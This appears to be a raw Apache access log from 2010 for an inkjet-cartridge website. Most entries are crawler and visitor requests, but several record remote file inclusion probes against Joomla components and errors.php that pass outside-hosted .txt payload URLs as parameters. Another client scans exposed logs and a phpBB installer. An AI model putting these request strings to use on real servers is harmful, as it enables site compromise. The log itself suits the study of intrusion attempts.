74.53.3.132 - - [02/Mar/2010:11:24:44 -0800] "GET /links/links19.html HTTP/1.0" 200 29321 "-" "Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:11:25:11 -0800] "GET /links/links14.html HTTP/1.0" 200 27471 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
74.53.3.132 - - [02/Mar/2010:11:26:03 -0800] "GET /links/links8_3.html HTTP/1.0" 200 17720 "-" "Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:11:26:23 -0800] "GET /phpbb/posting.php?mode=quote&p=1169 HTTP/1.0" 200 518 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
74.53.3.132 - - [02/Mar/2010:11:27:19 -0800] "GET /links/links10.html HTTP/1.0" 200 30360 "-" "Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:11:28:18 -0800] "GET /phpbb/viewtopic.php?t=922 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
74.53.3.132 - - [02/Mar/2010:11:28:36 -0800] "GET /links/links8_2.html HTTP/1.0" 200 21942 "-" "Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)" "site.inkjetcartridge.com"
74.53.3.132 - - [02/Mar/2010:11:29:37 -0800] "GET /links/links25_2.html HTTP/1.0" 200 35326 "-" "Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)" "site.inkjetcartridge.com"
74.53.3.132 - - [02/Mar/2010:11:30:37 -0800] "GET /links/links7.html HTTP/1.0" 200 35914 "-" "Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)" "site.inkjetcartridge.com"
74.53.3.132 - - [02/Mar/2010:11:31:36 -0800] "GET /links/links12.html HTTP/1.0" 200 11487 "-" "Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)" "site.inkjetcartridge.com"
89.108.64.216 - - [02/Mar/2010:11:31:44 -0800] "GET /logs/access.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "site.inkjetcartridge.com"
89.108.64.216 - - [02/Mar/2010:11:31:44 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "site.inkjetcartridge.com"
89.108.64.216 - - [02/Mar/2010:11:31:45 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.leaderpmc.com/banner/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "site.inkjetcartridge.com"
74.53.3.132 - - [02/Mar/2010:11:32:34 -0800] "GET /links/links6.html HTTP/1.0" 200 8545 "-" "Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)" "site.inkjetcartridge.com"
74.53.3.132 - - [02/Mar/2010:11:33:27 -0800] "GET /links/links19_2.html HTTP/1.0" 200 29325 "-" "Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)" "site.inkjetcartridge.com"
74.53.3.132 - - [02/Mar/2010:11:34:24 -0800] "GET /links/add_link.html HTTP/1.0" 200 13168 "-" "Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)" "site.inkjetcartridge.com"
74.53.3.132 - - [02/Mar/2010:11:35:14 -0800] "GET /links/modify.html HTTP/1.0" 200 7198 "http://site.inkjetcartridge.com/links/add_link.html" "Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)" "site.inkjetcartridge.com"
74.53.3.132 - - [02/Mar/2010:11:36:08 -0800] "GET /links/send_password.html HTTP/1.0" 200 6943 "http://site.inkjetcartridge.com/links/modify.html" "Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)" "site.inkjetcartridge.com"
74.53.3.132 - - [02/Mar/2010:11:36:56 -0800] "GET /links/links21.html HTTP/1.0" 200 27411 "-" "Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)" "site.inkjetcartridge.com"
74.53.3.132 - - [02/Mar/2010:11:37:47 -0800] "GET /links/links4.html HTTP/1.0" 200 27407 "-" "Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)" "site.inkjetcartridge.com"
74.53.3.132 - - [02/Mar/2010:11:38:36 -0800] "GET /links/links.html HTTP/1.0" 200 19496 "-" "Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)" "site.inkjetcartridge.com"
74.53.3.132 - - [02/Mar/2010:11:39:25 -0800] "GET /links/links12_2.html HTTP/1.0" 200 29518 "-" "Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)" "site.inkjetcartridge.com"
74.53.3.132 - - [02/Mar/2010:11:40:12 -0800] "GET /links/links8.html HTTP/1.0" 200 21874 "-" "Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)" "site.inkjetcartridge.com"
74.53.3.132 - - [02/Mar/2010:11:41:03 -0800] "GET /links/links19_3.html HTTP/1.0" 200 37767 "-" "Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)" "site.inkjetcartridge.com"
74.53.3.132 - - [02/Mar/2010:11:41:59 -0800] "GET /links/links4_2.html HTTP/1.0" 200 29383 "-" "Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)" "site.inkjetcartridge.com"
74.53.3.132 - - [02/Mar/2010:11:42:52 -0800] "GET /links/links17.html HTTP/1.0" 200 27411 "-" "Mozilla/5.0 (compatible; LinksManager.com_bot +http://linksmanager.com/linkchecker.html)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:11:43:06 -0800] "GET /phpbb/viewtopic.php?t=795&highlight= HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:11:46:57 -0800] "GET /phpbb/viewtopic.php?p=2062 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
207.46.195.239 - - [02/Mar/2010:11:51:43 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
67.152.29.130 - - [02/Mar/2010:11:53:27 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "ShopWiki/1.0 ( +http://www.shopwiki.com/wiki/Help:Bot)" "site.inkjetcartridge.com"
76.7.0.16 - - [02/Mar/2010:11:55:27 -0800] "GET /links/links19_3.html HTTP/1.1" 200 37767 "-" "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 4.1; Dealio Toolbar 4.5.24)" "site.inkjetcartridge.com"
76.7.0.16 - - [02/Mar/2010:11:55:28 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; InfoPath.1; MSN Optimized)" "site.inkjetcartridge.com"
76.7.0.16 - - [02/Mar/2010:11:55:28 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; InfoPath.1; MSN Optimized)" "site.inkjetcartridge.com"
64.136.26.231 - - [02/Mar/2010:11:55:45 -0800] "GET /email/images/inkmail20_01.gif HTTP/1.1" 200 20486 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
64.136.26.231 - - [02/Mar/2010:11:55:45 -0800] "GET /email/images/inkmail20_03.gif HTTP/1.1" 200 14595 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
64.136.26.231 - - [02/Mar/2010:11:55:45 -0800] "GET /email/images/inkmail20_04.gif HTTP/1.0" 200 16920 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
64.136.26.231 - - [02/Mar/2010:11:55:45 -0800] "GET /email/images/inkmail20_05.gif HTTP/1.1" 200 15268 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
64.136.26.231 - - [02/Mar/2010:11:55:46 -0800] "GET /email/images/inkmail20_06.gif HTTP/1.1" 200 17301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
64.136.26.231 - - [02/Mar/2010:11:55:46 -0800] "GET /email/images/inkmail20_07.gif HTTP/1.1" 200 17556 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:29 -0800] "GET /logs/access.log HTTP/1.1" 200 482617 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:30 -0800] "GET /logs/scripts.log HTTP/1.1" 200 604845 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:31 -0800] "GET /links/links6.html HTTP/1.1" 200 8545 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:32 -0800] "GET /tmp/mailError.log HTTP/1.1" 200 28504 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:33 -0800] "GET /links/links8_5.html HTTP/1.1" 200 10583 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:34 -0800] "GET /links/links4_2.html HTTP/1.1" 200 29383 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:34 -0800] "GET /blog1/archives.html HTTP/1.1" 200 6458 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:35 -0800] "GET / HTTP/1.1" 200 2132 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:36 -0800] "GET /tmp/ HTTP/1.1" 200 802 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:38 -0800] "GET /logs/ HTTP/1.1" 200 1081 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:39 -0800] "GET /email/ HTTP/1.1" 200 659 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:40 -0800] "GET /links/ HTTP/1.1" 200 6611 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:41 -0800] "GET /boomerang_images/ HTTP/1.1" 200 2374 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:41 -0800] "GET /images/ HTTP/1.1" 200 90939 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:42 -0800] "GET /tmp/?N=A HTTP/1.1" 200 802 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:43 -0800] "GET /tmp/?D=A HTTP/1.1" 200 802 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:44 -0800] "GET /tmp/?D=D HTTP/1.1" 200 802 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:44 -0800] "GET /tmp/?M=D HTTP/1.1" 200 802 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:47 -0800] "GET /tmp/?S=A HTTP/1.1" 200 802 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:48 -0800] "GET /tmp/?S=D HTTP/1.1" 200 802 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:48 -0800] "GET /tmp/?N=D HTTP/1.1" 200 802 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:49 -0800] "GET /email/?M=D HTTP/1.1" 200 659 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:50 -0800] "GET /email/?S=D HTTP/1.1" 200 659 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:51 -0800] "GET /email/?N=A HTTP/1.1" 200 659 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:52 -0800] "GET /email/?M=A HTTP/1.1" 200 659 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:53 -0800] "GET /email/?D=D HTTP/1.1" 200 659 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:54 -0800] "GET /images/?S=A HTTP/1.1" 200 90939 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:54 -0800] "GET /images/?N=D HTTP/1.1" 200 90939 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:13:59 -0800] "GET /images/?M=D HTTP/1.1" 200 90939 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:14:27 -0800] "GET /phpbb/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:15:23 -0800] "GET /blog/ HTTP/1.0" 200 4578 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:15:24 -0800] "GET /blog1/ HTTP/1.1" 200 6233 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:15:26 -0800] "GET /phpBB2/ HTTP/1.1" 302 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:15:27 -0800] "GET /phpBB2/install/install.php HTTP/1.1" 200 6355 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:12:15:37 -0800] "GET /phpbb/viewtopic.php?p=518 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
113.254.186.67 - - [02/Mar/2010:12:16:13 -0800] "GET /blog-mt1/ HTTP/1.1" 200 2778 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "site.inkjetcartridge.com"
69.147.115.61 - - [02/Mar/2010:12:19:22 -0800] "GET / HTTP/1.1" 200 2132 "-" "-" "site.inkjetcartridge.com"
69.147.115.61 - - [02/Mar/2010:12:19:22 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "-" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:12:23:11 -0800] "GET /phpbb/profile.php?mode=viewprofile&u=268 HTTP/1.0" 200 518 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
68.202.64.64 - - [02/Mar/2010:12:27:13 -0800] "GET /email/images/inkmail21_01.gif HTTP/1.1" 200 7485 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "site.inkjetcartridge.com"
68.202.64.64 - - [02/Mar/2010:12:27:14 -0800] "GET /email/images/inkmail21_03.gif HTTP/1.1" 200 16134 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; GTB6.4; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:12:27:58 -0800] "GET /phpbb/viewtopic.php?t=227 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:12:30:07 -0800] "GET /links/links6.html HTTP/1.0" 200 8545 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:12:41:40 -0800] "GET /phpbb/viewtopic.php?t=115 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:12:44:36 -0800] "GET /phpbb/profile.php?mode=viewprofile&u=20 HTTP/1.0" 200 518 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:13:00:20 -0800] "GET /links/links23.html HTTP/1.0" 200 27355 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:13:05:15 -0800] "GET /tmp/ HTTP/1.0" 200 786 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:13:10:26 -0800] "GET /links/links13.html HTTP/1.0" 200 27382 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
71.185.52.70 - - [02/Mar/2010:13:11:48 -0800] "GET /email/images/inkmail20_04.gif HTTP/1.1" 200 16920 "http://us.mc586.mail.yahoo.com/mc/welcome?.gx=1&.tm=1267563849&.rand=3qil7ibdsv81l" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; yie8)" "site.inkjetcartridge.com"
71.185.52.70 - - [02/Mar/2010:13:11:48 -0800] "GET /email/images/inkmail20_03.gif HTTP/1.1" 200 14595 "http://us.mc586.mail.yahoo.com/mc/welcome?.gx=1&.tm=1267563849&.rand=3qil7ibdsv81l" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; yie8)" "site.inkjetcartridge.com"
71.185.52.70 - - [02/Mar/2010:13:11:48 -0800] "GET /email/images/inkmail20_06.gif HTTP/1.1" 200 17301 "http://us.mc586.mail.yahoo.com/mc/welcome?.gx=1&.tm=1267563849&.rand=3qil7ibdsv81l" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; yie8)" "site.inkjetcartridge.com"
71.185.52.70 - - [02/Mar/2010:13:11:48 -0800] "GET /email/images/inkmail20_07.gif HTTP/1.1" 200 17556 "http://us.mc586.mail.yahoo.com/mc/welcome?.gx=1&.tm=1267563849&.rand=3qil7ibdsv81l" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; yie8)" "site.inkjetcartridge.com"
71.185.52.70 - - [02/Mar/2010:13:11:48 -0800] "GET /email/images/inkmail20_05.gif HTTP/1.1" 200 15268 "http://us.mc586.mail.yahoo.com/mc/welcome?.gx=1&.tm=1267563849&.rand=3qil7ibdsv81l" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 1.1.4322; IEMB3; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; yie8)" "site.inkjetcartridge.com"
208.115.111.245 - - [02/Mar/2010:13:17:52 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "site.inkjetcartridge.com"
207.46.199.39 - - [02/Mar/2010:13:19:59 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "site.inkjetcartridge.com"
4.154.32.227 - - [02/Mar/2010:13:22:44 -0800] "GET /email/images/inkmail19_02.gif HTTP/1.1" 200 6629 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" "site.inkjetcartridge.com"
72.55.133.120 - - [02/Mar/2010:13:23:28 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.newpeople.co.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.55.133.120 - - [02/Mar/2010:13:23:28 -0800] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.newpeople.co.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.55.133.120 - - [02/Mar/2010:13:23:28 -0800] "GET /logs/access.log%20%20///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.newpeople.co.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.55.133.120 - - [02/Mar/2010:13:23:55 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.newpeople.co.kr/id/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.55.133.120 - - [02/Mar/2010:13:23:55 -0800] "GET /logs/access.log%20%20///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.newpeople.co.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.55.133.120 - - [02/Mar/2010:13:23:55 -0800] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.newpeople.co.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:13:23:59 -0800] "GET /email/?S=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:13:24:25 -0800] "GET /phpbb/viewtopic.php?t=1545 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
72.55.133.120 - - [02/Mar/2010:13:27:59 -0800] "GET /logs/access.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.newpeople.co.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
72.55.133.120 - - [02/Mar/2010:13:28:31 -0800] "GET /logs/access.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.newpeople.co.kr/id/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:13:29:35 -0800] "GET /boomerang_images/?M=A HTTP/1.0" 200 2358 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:13:38:27 -0800] "GET /phpbb/viewtopic.php?t=992 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:13:39:58 -0800] "GET /tmp/?N=D HTTP/1.0" 200 786 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:13:50:17 -0800] "GET /blog/atom.xml HTTP/1.0" 200 659 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
218.38.12.239 - - [02/Mar/2010:13:57:32 -0800] "GET /logs/access.log/errors.php?error=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
67.195.115.218 - - [02/Mar/2010:14:01:16 -0800] "GET /phpbb/viewtopic.php?p=952 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "site.inkjetcartridge.com"
218.38.12.239 - - [02/Mar/2010:14:04:20 -0800] "GET /logs/scripts.log/errors.php?error=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "site.inkjetcartridge.com"
